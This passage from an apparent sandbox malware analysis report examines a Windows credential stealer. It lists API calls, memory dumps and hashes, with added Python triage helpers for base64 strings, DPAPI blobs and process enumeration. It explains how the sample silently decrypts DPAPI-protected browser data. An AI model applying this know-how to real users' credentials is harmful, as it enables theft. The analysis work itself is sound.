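    if crypt_string_to_binary(text, CRYPT_STRING_BASE64, buf) != size:
        return None
    return bytes(buf)      # caller keeps a copy, then LocalFree(buf)


# A run of base64 alphabet characters with optional padding (example's own heuristic).
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{8,}={0,2}")


def harvest_base64(dump):
    """Scan a memory dump for base64 runs and decode each the way the sample does.

    Returns a list of (offset, decoded_bytes) for runs that decode cleanly.
    """
    hits = []
    for m in B64_RUN.finditer(dump):
        token = m.group().decode("ascii")
        if len(token.rstrip("=")) % 4 == 1:  # no base64 string has this length
            continue
        decoded = decode_like_sample(token)
        if decoded is not None:
            hits.append((m.start(), decoded))
    return hits


# Constructed test dump (not data from the report): two base64 tokens separated by
# bytes outside the base64 alphabet, as they would sit between other data in memory.
SAMPLE_DUMP = (b"\x00\x01" + base64.b64encode(b"kernel32.dll")
               + b"\x00\xff" + base64.b64encode(b"\\Google\\Chrome\\User Data") + b"\x00")

if __name__ == "__main__":
    for offset, data in harvest_base64(SAMPLE_DUMP):
        print(f"{offset:#06x}: {data!r}")
```

Run it against one of the .sdmp regions listed under Memory Dump Source by reading the file into `harvest_base64`; anything that decodes to printable text is a candidate for the strings the two decode routines consume, and anything that does not is worth a second look with whatever transform follows the decode in the disassembly.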
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: f2cb10fddd29b12f0235ce133827b87b1c0092cd700d2ece2ac5bdaa1b25b773
                            • Instruction ID: 33480fb84591befcf435fed7c9a481049ccd48e35b80e6cf0cf4aca0bb51c3ea
                            • Opcode Fuzzy Hash: f2cb10fddd29b12f0235ce133827b87b1c0092cd700d2ece2ac5bdaa1b25b773
                            • Instruction Fuzzy Hash: D6415C7590421EDBDB10CFA4DD89FFEB7B8AB49304F1045A9E609A7280D7745A84CFA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000D72AD
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000D72B4
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000D72E1
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000D7304
                            • LocalFree.KERNEL32(?), ref: 000D730E
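The CryptUnprotectData call at 000D72E1 passes NULL for the description, entropy, reserved and prompt arguments and dwFlags=00000001 (CRYPTPROTECT_UI_FORBIDDEN), so decryption proceeds silently as the logged-on user; the result is then converted with WideCharToMultiByte into the 0x400-byte heap buffer allocated just before, and the DPAPI output is released with LocalFree. The blob handed to that call carries the GUID of the DPAPI master key needed to decrypt it, which is what an incident responder wants when working out which user's master keys the stealer relied on. The Python below is an added example, not code from this report or from the sample: a parser for the fixed DPAPI blob header, a builder for constructed test blobs, and a triage helper that groups blobs by master key. The provider GUID and the header layout are those of the documented DPAPI blob format; the function names, the test GUID and the description text are made up for the example.

```python
import struct
import uuid

CRYPTPROTECT_UI_FORBIDDEN = 0x1   # dwFlags=00000001 in the CryptUnprotectData call above
OUT_BUFFER_SIZE = 0x400           # cbMultiByte handed to WideCharToMultiByte above
# Fixed provider GUID that opens every DPAPI blob (documented DPAPI blob format).
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
HEADER_LEN = 48                   # bytes up to and including the description length


def parse_dpapi_blob(blob):
    """Parse the fixed header of a DPAPI blob (the DATA_BLOB passed to CryptUnprotectData).

    Layout, little-endian: DWORD version (1) | GUID provider | DWORD masterkey version |
    GUID masterkey | DWORD flags | DWORD description length | WCHAR description[].
    The remaining fields (algorithm ids, salt, HMAC material, ciphertext, signature)
    are not needed to attribute a blob to a master key, so they are left unparsed.
    """
    blob = bytes(blob)
    if len(blob) < HEADER_LEN:
        raise ValueError("too short for a DPAPI blob")
    version = struct.unpack_from("<I", blob, 0)[0]
    provider = uuid.UUID(bytes_le=blob[4:20])
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob")
    mk_version = struct.unpack_from("<I", blob, 20)[0]
    masterkey = uuid.UUID(bytes_le=blob[24:40])
    flags, desc_len = struct.unpack_from("<II", blob, 40)
    if HEADER_LEN + desc_len > len(blob):
        raise ValueError("description runs past end of blob")
    description = blob[HEADER_LEN:HEADER_LEN + desc_len].decode("utf-16-le").rstrip("\x00")
    return {
        "masterkey_version": mk_version,
        "masterkey_guid": str(masterkey),
        "flags": flags,
        "description": description,
        "body_offset": HEADER_LEN + desc_len,   # where the unparsed fields start
    }


def build_dpapi_blob(masterkey_guid, description, body=b""):
    """Constructed blob for testing: real header fields, `body` stands in for the rest."""
    desc = (description + "\x00").encode("utf-16-le")
    return (struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le
            + struct.pack("<I", 1) + uuid.UUID(masterkey_guid).bytes_le
            + struct.pack("<II", 0, len(desc)) + desc + body)


def group_by_masterkey(blobs):
    """Triage: which master key GUIDs would CryptUnprotectData need for these blobs?

    `blobs` is an iterable of (label, bytes); non-DPAPI data is skipped.
    """
    groups = {}
    for label, blob in blobs:
        try:
            info = parse_dpapi_blob(blob)
        except ValueError:
            continue
        groups.setdefault(info["masterkey_guid"], []).append(label)
    return groups


if __name__ == "__main__":
    demo = build_dpapi_blob("11111111-2222-3333-4444-555555555555", "constructed example", b"\xaa" * 16)
    print(parse_dpapi_blob(demo))
```

The master key GUID maps to a file under the user's `%APPDATA%\Microsoft\Protect\<SID>\` directory; a blob whose GUID is not present there cannot have been decrypted by this call on this host, which narrows what the stealer could actually have obtained. Note also that the sample's output buffer is fixed at 0x400 bytes, so a decrypted value longer than that would not survive the WideCharToMultiByte step.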
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: c76738f603c3435287c2deb38a9e039a827697a09b840dc3933b85794b4cfc03
                            • Instruction ID: 3cefd7b6f61fbffc950b5ea724db38ef39f169aa0ac4c177fef7dd20409fa2c3
                            • Opcode Fuzzy Hash: c76738f603c3435287c2deb38a9e039a827697a09b840dc3933b85794b4cfc03
                            • Instruction Fuzzy Hash: D6011E75A44308BBEB10DFE4DC46FAE7778EB44B00F108545FB05BB2C0D6B0AA409B64
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E97AE
                            • Process32First.KERNEL32(000F0ACE,00000128), ref: 000E97C2
                            • Process32Next.KERNEL32(000F0ACE,00000128), ref: 000E97D7
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 000E97EC
                            • CloseHandle.KERNEL32(000F0ACE), ref: 000E980A
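The calls at 000E97AE..000E980A are the standard Toolhelp32 process walk: CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS=2, 0), Process32First and Process32Next with dwSize=0x128 (the 296-byte 32-bit ANSI PROCESSENTRY32), a StrCmpCA on each entry, and CloseHandle on the snapshot. StrCmpCA is the case-sensitive ANSI compare, so whatever name the sample is looking for has to match szExeFile exactly as the kernel reports it. The Python below is an added example, not code from this report or from the sample; it packs constructed PROCESSENTRY32 records of that same size and reproduces the walk and the compare so the case-sensitivity caveat can be checked offline. The process list and helper names are this example's own, and the listing above does not say which name the sample compares against.

```python
import struct

TH32CS_SNAPPROCESS = 0x2      # first argument to CreateToolhelp32Snapshot above
PROCESSENTRY32_SIZE = 0x128   # dwSize (296 bytes) passed to Process32First/Next above
MAX_PATH = 260
# PROCESSENTRY32 (32-bit, ANSI): dwSize, cntUsage, th32ProcessID, th32DefaultHeapID,
# th32ModuleID, cntThreads, th32ParentProcessID, pcPriClassBase, dwFlags, szExeFile[MAX_PATH]
PE32_FMT = "<9I260s"
assert struct.calcsize(PE32_FMT) == PROCESSENTRY32_SIZE


def make_entry(pid, ppid, exe_name):
    """Pack one PROCESSENTRY32 as Process32First/Next would fill it (constructed test data)."""
    name = exe_name.encode("ascii")[:MAX_PATH - 1]
    return struct.pack(PE32_FMT, PROCESSENTRY32_SIZE, 0, pid, 0, 0, 1, ppid, 8, 0,
                       name.ljust(MAX_PATH, b"\x00"))


def make_snapshot(processes):
    """Stand-in for CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0): a list of packed entries."""
    return [make_entry(pid, ppid, name) for pid, ppid, name in processes]


def entry_pid(entry):
    return struct.unpack(PE32_FMT, entry)[2]


def entry_exe_file(entry):
    """szExeFile is a NUL-terminated CHAR array; stop at the first NUL."""
    return struct.unpack(PE32_FMT, entry)[9].split(b"\x00", 1)[0].decode("ascii")


def str_cmp_ca(a, b):
    """StrCmpCA: case-sensitive compare, 0 when equal, no locale folding."""
    return (a > b) - (a < b)


def find_process(snapshot, target):
    """The loop at 000E97AE..000E980A: Process32First, then Process32Next until StrCmpCA
    returns 0. The snapshot handle is closed on every exit path. Returns the PID or None."""
    if not snapshot:              # Process32First failed: nothing to walk
        return None
    found = None
    for entry in snapshot:        # First, then Next, Next, ...
        if str_cmp_ca(entry_exe_file(entry), target) == 0:
            found = entry_pid(entry)
            break
    # CloseHandle(snapshot) here on both the found and the not-found path
    return found


if __name__ == "__main__":
    snap = make_snapshot([(4, 0, "System"), (1234, 800, "explorer.exe"), (4321, 1234, "Taskmgr.exe")])
    print(find_process(snap, "Taskmgr.exe"), find_process(snap, "taskmgr.exe"))
```

Because the compare is case-sensitive, a process name that differs only in case from what the sample expects is not matched; when reproducing the check in a lab, take the exact szExeFile spelling from a snapshot on the target Windows build rather than from memory.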
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 460db1a3b3055d142545c12b656d7734d5d3c887bc3aef8122b6280a2a432ac4
                            • Instruction ID: cae6aa3af57a233dad358982b8338e1ddc13bfacf997aa9c147af26aa313a62d
                            • Opcode Fuzzy Hash: 460db1a3b3055d142545c12b656d7734d5d3c887bc3aef8122b6280a2a432ac4
                            • Instruction Fuzzy Hash: DA010875A14208AFDB21DFA5CD88BEDBBFCBB49700F104588E909A6250EB309A44DF50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: <7\h$huzx
                            • API String ID: 0-2989614873
                            • Opcode ID: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                            • Instruction ID: 0d07da66965ec539353409d5ae7c7d3167fd38ff278ca15b294dde634989ab90
                            • Opcode Fuzzy Hash: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                            • Instruction Fuzzy Hash: 6763333241EBD81EC727CB304BB61617F66BB1361131D49CECAC18B9B3C6949A1AF356
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 9R{g$FjZ$Tk$^sN
                            • API String ID: 0-4006639847
                            • Opcode ID: 9bede8b166b0e5cc9320a1f16a8c3df14df726100e26add76027049e604cfd1a
                            • Instruction ID: c2f67615792058e480c334e196cdaff486e6304eaa2f14def445d164fa463ec8
                            • Opcode Fuzzy Hash: 9bede8b166b0e5cc9320a1f16a8c3df14df726100e26add76027049e604cfd1a
                            • Instruction Fuzzy Hash: FAB22AF360C2049FE304AE2DEC4567ABBE9EF94720F1A893DE6C4C7744EA3558058796
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: c\$6q9w${S}$}~x
                            • API String ID: 0-1896102235
                            • Opcode ID: 8faa601c3065a36f97a8471a503c1c6654aac55640b7d4b37b98185fec17cb54
                            • Instruction ID: 9bac58ea10008e5c291a3ebf7a32d75e6d8e28f7204fa54cd0a4bc565eaa2868
                            • Opcode Fuzzy Hash: 8faa601c3065a36f97a8471a503c1c6654aac55640b7d4b37b98185fec17cb54
                            • Instruction Fuzzy Hash: 95B207F360C2049FE304AE2DEC8567AFBE9EB94720F16493DEAC4C7744EA3558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !/C$.%a/$<Y}W$[s{m
                            • API String ID: 0-4121493079
                            • Opcode ID: 001c2d30a3148afb2374791ffc64fb10710acc994c570814d0f96069ce1e0767
                            • Instruction ID: 28e34ba643d669d4f7eff79ff0f32ec3ce519171f76a69f71fae7805025af384
                            • Opcode Fuzzy Hash: 001c2d30a3148afb2374791ffc64fb10710acc994c570814d0f96069ce1e0767
                            • Instruction Fuzzy Hash: A9B207F3A0C204AFE3046F2DEC8567ABBE9EB94720F16493DEAC5C3744E63558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ?C>.$Ik$hWA{$m0q<
                            • API String ID: 0-3673785742
                            • Opcode ID: 8edd547f26a138e4dcd65fb1a149ebe776ad55e69f0bdb7cccb3efbe2cdb960c
                            • Instruction ID: 17c25486d2f09fcdaf64e063f8a41425f4ba2253948ca79d34e5ee7fc325dcad
                            • Opcode Fuzzy Hash: 8edd547f26a138e4dcd65fb1a149ebe776ad55e69f0bdb7cccb3efbe2cdb960c
                            • Instruction Fuzzy Hash: E9B2F5F3A0C2109FE3046E2DEC8566ABBE9EF94720F1A493DEAC4C7744E63558058797
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 4&`@$86Z$cO0l$v[
                            • API String ID: 0-284000037
                            • Opcode ID: aedf1d6479cc524ad9c9e3004ce474e023cacc6641a61997194bbe0514ac3b31
                            • Instruction ID: db299e5bc878649235acfb84434db193ea0e446b9662772163a9fa8ea96b5e15
                            • Opcode Fuzzy Hash: aedf1d6479cc524ad9c9e3004ce474e023cacc6641a61997194bbe0514ac3b31
                            • Instruction Fuzzy Hash: 3CB2F7F360C2049FE3046E2DEC8567ABBE9EF94720F16893DEAC4C7744EA3558058796
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .Xg5$19}:$g5r}$~>
                            • API String ID: 0-3277375165
                            • Opcode ID: e6bc3327492d4f30130b7ec9257ceb2e0c88222291c730ad6ab3dbc114d917ed
                            • Instruction ID: 9aa0b5f16b091522c87e8ab23e31423bf0bff568d6b9775a380d08102652889b
                            • Opcode Fuzzy Hash: e6bc3327492d4f30130b7ec9257ceb2e0c88222291c730ad6ab3dbc114d917ed
                            • Instruction Fuzzy Hash: 6EB2E4F3908204AFE304AF2DEC4567ABBE9EF94720F1A493DE6C5C3740E63599058697
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,000D51D4,40000001,00000000,00000000,?,000D51D4), ref: 000E9050
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: fbb7329177b9510b3a5364301b85fc9d8bda200982d172d2ac6ca7a1c2eee68f
                            • Instruction ID: c5111fee753a75dcff14d7047adfbac01c3a5c712037ac2bae4cec49808a1d6f
                            • Opcode Fuzzy Hash: fbb7329177b9510b3a5364301b85fc9d8bda200982d172d2ac6ca7a1c2eee68f
                            • Instruction Fuzzy Hash: 4A110370204248FFDF54CF65DC84FAA33A9AF8A310F508448FA199B350E776E9418BA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000F0DE8,00000000,?), ref: 000E7B40
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7B47
                            • GetLocalTime.KERNEL32(?,?,?,?,?,000F0DE8,00000000,?), ref: 000E7B54
                            • wsprintfA.USER32 ref: 000E7B83
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 8e42b6563c7545e9efeac0935c76f5456fef4f482bdf33945ae8c0f1c11697a4
                            • Instruction ID: b43719a7f23c3c907d57af8593b7b49da2e68281bc9d2a2ac88683078c8676f1
                            • Opcode Fuzzy Hash: 8e42b6563c7545e9efeac0935c76f5456fef4f482bdf33945ae8c0f1c11697a4
                            • Instruction Fuzzy Hash: 6D112AB2908118ABCB14DBCADD85BBEB7BCFB4DB11F10451AF605A2280E3395940C7B0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D4E350,00000000,?,000F0DF8,00000000,?,00000000,00000000), ref: 000E7BF3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7BFA
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D4E350,00000000,?,000F0DF8,00000000,?,00000000,00000000,?), ref: 000E7C0D
